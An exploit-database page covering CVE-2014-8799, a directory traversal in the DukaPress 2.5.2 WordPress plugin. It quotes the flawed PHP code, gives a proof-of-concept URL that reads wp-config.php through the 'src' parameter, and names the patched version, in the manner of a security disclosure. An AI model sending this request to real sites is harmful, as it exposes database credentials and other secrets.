WordPress Plugin DukaPress 2.5.2 - Directory Traversal

🗓️ 24 Nov 2014 00:00:00Reported by Kacper SzurekType

DukaPress 2.5.2 - Directory Traversal, allows path traversal via dp_img_resize() function

Reporter	Title	Published	Views	Family All 14
0day.today	DukaPress 2.5.2 Path Traversal Vulnerability	22 Nov 201400:00	–	zdt
Circl	CVE-2014-8799	29 May 201815:50	–	circl
CVE	CVE-2014-8799	28 Nov 201415:00	–	cve
Cvelist	CVE-2014-8799	28 Nov 201415:00	–	cvelist
exploitpack	WordPress Plugin DukaPress 2.5.2 - Directory Traversal	24 Nov 201400:00	–	exploitpack
Metasploit	WordPress DukaPress Plugin File Read Vulnerability	16 Apr 201510:17	–	metasploit
Nuclei	WordPress Plugin DukaPress 2.5.2 - Directory Traversal	1 Jun 202605:38	–	nuclei
NVD	CVE-2014-8799	28 Nov 201415:59	–	nvd
OpenVAS	WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)	20 Nov 202000:00	–	openvas
OpenVAS	WordPress DukaPress 'src' Parameter Directory Traversal Vulnerability	9 Jan 201500:00	–	openvas

# Exploit Title: DukaPress 2.5.2 Path Traversal
# Date: 27-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl
# Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip
# Category: webapps
# CVE: CVE-2014-8799
  
1. Description

dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist.

File: dukapress\lib\dp_image.php
if (!function_exists('add_action')) {
    require_once('../../../../wp-load.php');
}

echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));
 
http://security.szurek.pl/dukapress-252-path-traversal.html
  
2. Proof of Concept
  
http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
  
3. Solution:
  
Update to version 2.5.4

https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip
https://plugins.trac.wordpress.org/changeset/1024640/dukapress

24 Nov 2014 00:00Current

9.5High risk

Vulners AI Score9.5

CVSS 25

EPSS0.91126